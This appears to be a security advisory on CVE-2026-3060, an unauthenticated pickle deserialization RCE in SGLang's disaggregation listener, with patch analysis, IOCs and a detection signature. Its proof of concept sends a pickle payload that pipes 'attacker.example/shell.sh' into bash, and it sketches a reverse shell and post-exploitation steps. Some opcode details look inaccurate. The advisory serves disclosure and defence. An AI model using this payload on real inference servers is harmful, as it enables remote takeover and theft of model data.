CVE-2026-3060: Unauthenticated RCE in SGLang's Disaggregation Module via pickle.loads()

SGLang's encoder parallel disaggregation system deserializes untrusted network data with pickle.loads() and no authentication, enabling unauthenticated remote code execution against any exposed inference server.

// PLAIN ENGLISH VERSION

A serious security flaw has been discovered in SGLang, a popular artificial intelligence software tool. The vulnerability allows attackers to take complete control of computers running the software without needing any password or permission.

Here's what's happening: SGLang uses a feature called "pickle" to read data from other computers. Think of pickle like a way to package information so it can be sent over the internet. The problem is that SGLang accepts this packaged data without checking who sent it or whether it's trustworthy. It's like accepting a package at your front door without verifying it actually came from someone you know.

An attacker can send specially crafted malicious data to SGLang, and the software will automatically execute whatever instructions are hidden inside. This gives the attacker complete control — they could steal data, install ransomware, or use your computer to attack others.

Who's at risk? Anyone running SGLang, particularly companies and researchers using it for AI work. If SGLang is exposed to the internet or runs on a shared network, the danger is even greater. University labs and AI development teams should be especially concerned.

The good news is that security researchers haven't found evidence of attackers actively exploiting this yet, so there's still time to fix it.

If you or your organization uses SGLang, you should immediately: First, check if you're running it and update to the latest version when available. Second, don't expose SGLang directly to the internet — keep it on protected internal networks only. Third, monitor any computers running SGLang for suspicious activity and consider temporarily disabling the software if you can't update right away.

Want the full technical analysis? Click "Technical" above.

▶ Attack flow — CVE-2026-3060 · Remote Code Execution

Vulnerability Overview

CVE-2026-3060 is a CVSS 9.8 critical unauthenticated remote code execution vulnerability in SGLang's disaggregation subsystem. The encoder parallel disaggregation module accepts arbitrary network connections and passes attacker-controlled byte streams directly to pickle.loads() with no authentication, no HMAC validation, and no type restrictions. Any process reachable on the disaggregation listener port is fully compromised.

SGLang is a high-performance inference framework widely deployed for LLM serving. The disaggregation feature splits prefill and decode phases across separate worker nodes — a performance optimization that introduces a cross-node RPC channel that, prior to this patch, was entirely unauthenticated and executed arbitrary Python objects on receipt.

Root cause: The disaggregation bootstrap receiver calls pickle.loads() on raw socket data from unauthenticated remote peers with no sandboxing, type restriction, or integrity verification.

Affected Component

The vulnerable code lives in SGLang's disaggregation module, specifically the encoder parallel bootstrap and transfer path. The relevant file is python/sglang/srt/disaggregation/ — both the base decode.py / prefill.py transfer managers and the MooncakeTransferEngine backend. The listener binds on a configurable port exposed to the network during multi-node inference deployments. No credentials are required to reach it.

Root Cause Analysis

The disaggregation bootstrap handler receives connection metadata and KV-cache transfer descriptors from remote prefill workers. The original implementation serializes these descriptors with pickle for convenience — a common Python antipattern that becomes catastrophic when the receiving end is network-accessible.


# python/sglang/srt/disaggregation/decode.py (VULNERABLE)

import pickle
import socket

class DisaggregationDecodeTransferManager:

    def _bootstrap_recv_loop(self, conn: socket.socket):
        """Receive bootstrap metadata from prefill peer."""
        # BUG: raw socket data from unauthenticated remote peer
        header_bytes = _recv_exactly(conn, 4)
        payload_len  = int.from_bytes(header_bytes, "big")

        # BUG: attacker controls payload_len and payload content
        payload = _recv_exactly(conn, payload_len)

        # BUG: pickle.loads() on fully attacker-controlled bytes
        #      executes arbitrary Python via __reduce__ protocol
        meta = pickle.loads(payload)   # <-- CVE-2026-3060

        self._handle_bootstrap_meta(meta)

    def _recv_exactly(sock: socket.socket, n: int) -> bytes:
        buf = b""
        while len(buf) < n:
            chunk = sock.recv(n - len(buf))
            if not chunk:
                raise ConnectionError("peer disconnected")
            buf += chunk
        return buf

The __reduce__ protocol in Python's pickle format allows any serialized object to specify an arbitrary callable and arguments to invoke during deserialization. This is not a logic bug or an edge case — it is the intended behavior of pickle, used here on data that was never supposed to come from an adversary.


# Minimal PoC payload construction — attacker side
import pickle, os, struct, socket

class RCEPayload:
    def __reduce__(self):
        # pickle __reduce__: (callable, args) -> callable(*args) on loads()
        return (os.system, ("curl https://attacker.example/shell.sh | bash",))

payload  = pickle.dumps(RCEPayload())
header   = struct.pack(">I", len(payload))
frame    = header + payload

s = socket.create_connection(("victim-inference-node", 8998))
s.sendall(frame)
s.close()
# victim node executes os.system() as the sglang worker process user

No authentication token is checked before pickle.loads() is reached. The four-byte length prefix is the only gate, and it exists only for framing — not security.

Exploitation Mechanics


EXPLOIT CHAIN — CVE-2026-3060:

1. Attacker identifies an SGLang inference node with disaggregation enabled.
   Discovery: scan for default port (commonly 8998–9000 range) or read
   deployment configs leaked via model metadata endpoints.

2. Establish a raw TCP connection to the disaggregation bootstrap listener.
   No TLS, no authentication challenge issued by server.

3. Construct a malicious pickle payload using the __reduce__ protocol:
     RCEPayload.__reduce__() -> (os.system, ("cmd",))
   or for a full reverse shell:
     RCEPayload.__reduce__() -> (subprocess.Popen, (["/bin/bash","-i"],
                                  ..., PIPE, PIPE))

4. Prepend a 4-byte big-endian length header matching len(pickle.dumps(...)).

5. Send the 4-byte header followed immediately by the pickle frame.

6. Server _bootstrap_recv_loop() reads header, reads exactly payload_len bytes,
   calls pickle.loads(payload) — __reduce__ fires synchronously.

7. Arbitrary code executes in the worker process context.
   Typical deployment: runs as root or a service account with GPU/model access.

8. From model worker context: exfiltrate weights, pivot to other cluster nodes
   via shared NVLink/RDMA fabric, or persist via CUDA poisoning.

The exploit is completely pre-authentication and requires only network reachability. In cloud deployments using SGLang's disaggregation feature, the bootstrap port is often opened between nodes in the same VPC security group — attacker needs only one foothold node in that group.

Memory Layout

Unlike memory-corruption CVEs, the exploit surface here is the Python object graph rather than heap layout. However, understanding what pickle materializes is useful for detection:


PICKLE OPCODE STREAM (malicious frame, annotated):

offset  opcode  arg             meaning
------  ------  ---             -------
0x00    \x80    \x04            PROTO 4 (Python 3.8+)
0x02    \x95    [8-byte len]    FRAME header
0x0b    \x8c    \x08            SHORT_BINUNICODE len=8
0x0d    "builtins"              module name (attacker-controlled)
0x15    \x8c    \x06            SHORT_BINUNICODE len=6
0x17    "system"                attribute name -> os.system via __import__
...
0x??    \x93                    NEWOBJ_EX / REDUCE
0x??    \x85                    TUPLE1
0x??    \x52                    REDUCE -> calls os.system("cmd")
0x??    \x2e                    STOP

Python interpreter state during pickle.loads():
  dispatch_table lookup -> __reduce__ callback fires
  call stack: pickle.loads -> load_reduce -> callable(*args)
              = os.system("curl attacker/shell | bash")
  NO sandbox, NO restricted builtins, full interpreter access

Patch Analysis

The fix applied in PR #20904 replaces pickle serialization with a structured, schema-validated format. The bootstrap metadata is now exchanged as JSON (or a similarly safe format) with explicit field validation, and critically, no arbitrary object instantiation is possible on the receiving end.


# BEFORE (vulnerable) — python/sglang/srt/disaggregation/decode.py:
import pickle

def _bootstrap_recv_loop(self, conn):
    header_bytes = _recv_exactly(conn, 4)
    payload_len  = int.from_bytes(header_bytes, "big")
    payload      = _recv_exactly(conn, payload_len)
    meta         = pickle.loads(payload)          # arbitrary code execution
    self._handle_bootstrap_meta(meta)


# AFTER (patched, PR #20904) — explicit schema deserialization:
import json

# BootstrapMeta is now a plain dataclass — no __reduce__, no callables
@dataclasses.dataclass
class BootstrapMeta:
    request_id:    str
    kv_indices:    list[int]
    aux_data:      dict[str, int]

def _bootstrap_recv_loop(self, conn):
    header_bytes = _recv_exactly(conn, 4)
    payload_len  = int.from_bytes(header_bytes, "big")

    # BUG FIXED: enforce a maximum frame size before allocation
    if payload_len > MAX_BOOTSTRAP_FRAME:
        raise ValueError(f"oversized bootstrap frame: {payload_len}")

    payload = _recv_exactly(conn, payload_len)

    # SAFE: json.loads cannot instantiate arbitrary Python objects
    raw  = json.loads(payload.decode("utf-8"))

    # SAFE: strict schema validation; unknown keys raise TypeError
    meta = BootstrapMeta(
        request_id = str(raw["request_id"]),
        kv_indices = [int(x) for x in raw["kv_indices"]],
        aux_data   = {str(k): int(v) for k, v in raw.get("aux", {}).items()},
    )
    self._handle_bootstrap_meta(meta)

The patch also adds MAX_BOOTSTRAP_FRAME = 4 * 1024 * 1024 (4 MB) to prevent memory exhaustion via a large payload_len, a secondary issue the original code also exposed. Authentication between prefill and decode workers — via a pre-shared token checked before any deserialization — is added as a separate layer in the same PR.

Detection and Indicators

Because exploitation is a single TCP exchange with no multi-stage handshake, detection requires either network capture or process-level telemetry:


NETWORK IOCs:
  - Inbound TCP to disaggregation port from unexpected source IPs
  - Bootstrap frames where payload does not begin with valid JSON ({)
  - Frames beginning with pickle magic bytes: \x80\x04\x95 (PROTO 4)
    or \x80\x02 (PROTO 2) — these are never legitimate after patching

PROCESS IOCs:
  - sglang worker spawning sh, bash, curl, wget as child processes
  - Unexpected outbound connections from the inference worker PID
  - /proc//fd showing new network sockets post-bootstrap

SNORT/SURICATA SIGNATURE (bootstrap port, pickle magic):
  alert tcp any any -> $SGLANG_NODES $DISAGG_PORT (
    msg:"CVE-2026-3060 SGLang pickle RCE attempt";
    content:"|80 04 95|"; offset:4; depth:3;
    sid:2026306001; rev:1;
  )

Remediation

Immediate: Apply the patch from PR #20904. If patching is not immediately possible, firewall the disaggregation port to known prefill-worker IPs only. Do not expose it to the open internet or untrusted VPC peers under any circumstances.

Structural: Audit all other inter-node communication channels in SGLang for additional pickle usage. The pattern pickle.loads(network_data) should be treated as a critical finding in any code review. Use grep -rn "pickle.loads" python/sglang/srt/ against your deployed version to identify remaining instances before upgrading.

Defense in depth: Run inference workers as a dedicated low-privilege service account. Apply seccomp profiles restricting execve on worker processes — this converts RCE to a harder-to-exploit memory read primitive. Network-segment prefill and decode nodes into a dedicated security group with no egress to the internet.